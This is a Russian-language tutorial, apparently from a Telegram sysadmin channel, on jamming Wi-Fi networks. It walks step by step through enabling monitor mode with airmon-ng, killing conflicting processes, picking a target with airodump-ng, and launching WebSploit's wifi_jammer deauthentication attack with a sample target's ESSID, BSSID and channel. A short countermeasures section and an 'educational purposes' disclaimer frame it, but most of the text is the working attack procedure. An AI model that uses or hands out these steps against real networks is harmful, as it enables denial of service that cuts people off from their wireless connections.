Wifi_Jammer: как глушить WiFi
Добрый день, прежде чем начать статью, хочу в очередной раз предупредить, что вся информация представлена исключительно в целях ознакомления и никого не призывает к действиям. Друзья, эта статья создана для того, чтобы Вы понимали, как действует злоумышленник и могли защититься от его действий. Подписывайтесь на канал!
Итак, let's begin:
Возможно ли глушить Wi-Fi
Вы ответственно подошли к настройке беспроводных точек
доступа (Wi-Fi): воспользовались подсказками по настройке роутера, в первую очередь,
отключили WPS и придумали очень сложный пароль. Значит ли это, что теперь можно
расслабиться? Нет, у злоумышленников, как минимум, ещё пара трюков в рукаве —
DoS и глушение Wi-Fi. Даже если они не смогут проникнуть в вашу сеть, они могут
воспрепятствовать её нормальной работе.
Эта инструкция описывает глушение Wi-Fi, предназначенный для стресс-теста вашей
беспроводной сети, чтобы вы могли оценить имеющиеся угрозы и предпринять
превентивные меры безопасности.
Как запустить Wifi_Jammer
Посмотрим имя нашего интерфейса:
1| airmon-ng
Следующую команду запускаем так: airmon-ng start имя_интерфейса. У меня так:
1| airmon-ng start wlan0
Обратите внимание, у меня появилось предупреждение (у вас его может и не быть):
1| Found 2 processes that could cause trouble.
2| If airodump-ng, aireplay-ng or airtun-ng stops working after
3| a short period of time, you may want to kill (some of) them!
4| PID Name
5| 3036 NetworkManager
6| 3187 dhclient
Программа предупреждает, что имеются конфликты с другими приложениями и что
если airodump-ng, aireplay-ng или airtun-ng останавливают работу после короткого
времени, то мне нужно остановить названные процессы. Это можно сделать так (у вас
могут быть свои цифры — посмотрите на PID):
1| kill 3036
2| kill 3187
Продолжаем:
1| airodump-ng wlan0mon
Я буду тренироваться на своей собственной ТД — она в самом вверху.
Запускаем WebSploit
1| websploit
Задействуем плагин wifi_jammer:
1| wsf > use wifi/wifi_jammer
Посмотрим на его опции :
1| wsf:Wifi_Jammer > show options
Нам нужно задать essid, bssid, channel и mon. Эти данные можно взять из вывода
airodump-ng.
1| wsf:Wifi_Jammer > set essid Mial
2| wsf:Wifi_Jammer > set bssid 20:25:64:16:58:8C
3| wsf:Wifi_Jammer > set channel 11
Также обязательно:
1| wsf:Wifi_Jammer > set mon wlan0mon
Обратите внимание, что здесь нет вариантов, устанавливать значение нужно именно в
wlan0mon.
Запускаем командой run:
1| wsf:Wifi_Jammer > run
Контролировать процесс можно двумя способами. Первый — просто убедиться, что
ваши устройства больше не подключены к беспроводной сети Wi-Fi. Второй — с
помощью команды airodump-ng wlan0mon. Обратите на такое поле её вывода как
PWR. Его значение при нормальной работе находилось в районе 40.
После начала атаки значение PWR составляет 0 и до самого конца атаки не
поднимается. Сеть Wi-Fi в это время недоступна.
Суть атаки заключается в непрерывной отправке пакетов деаутентификации.
Борьба с глушением Wi-Fi
Есть модели роутеров, которые не обращают внимание на
широковещательные пакеты деаутентификации. Возможно, стоит поискать
подобные модели.
Во время атаки нужно понимать, что атакующий должен находиться в
непосредственной близости — не более чем в нескольких сотнях метров.
Можно настроить автоматический выбор канала в точке доступа. Это должно
затруднить атаку, т. к. атакующий должен будет заботиться о переключении
каналов.
Радикальное решение — купить проводной роутер.
Используйте полученные данные только в благих целях. Это оградит вас и других
людей от проблем.
Спасибо за внимание!
Подписывайтесь на канал!
________________________________________________________________
Источник: _t_._m_e/ to_sysadmins (убрать _)